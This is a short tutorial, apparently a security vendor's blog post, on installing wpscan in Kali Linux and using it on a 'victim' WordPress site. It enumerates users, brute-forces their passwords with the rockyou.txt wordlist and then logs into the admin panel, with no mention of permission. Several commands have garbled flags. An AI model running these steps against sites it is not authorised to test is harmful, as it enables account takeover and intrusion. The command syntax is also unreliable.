Follow the below steps:
Kali Linux is required to scan a website.
Steps to install wpscan in kali:-
1> Open cmd and type ( sudo apt install ruby ruby-dev
2> After installing ruby check gem with this code (gem -v)
3> Sudo gem install wpscan
4> It’s done for scan website
1> First type wpscan —help command use version plugins and themes
2> And also options and examples available on how to scan websites.
Scan Website command:-
1> wpscan – -url (IP address or Full url of victim)
> so you found the site up or down and running on WordPress or not.
2> wpscan -u (anywebsite.com)
> So all information shows about websites like PHP version which server use and many more.
3> How to find users on a website using this code
Wpscan –url (http://anywebsite/wordpress/) -e u
4> After finding the user how to find password follow this code
Wpscan -U http://anywebsite/wordpress/ —wordlist /root/Desktop/rockyou.txt —username (which user you find name type here)
> After password match complete password show.
> Then you open the admin panel any type username or password so you can easily use the account.
To know more about it and secure your website, visit TheWebOrion.com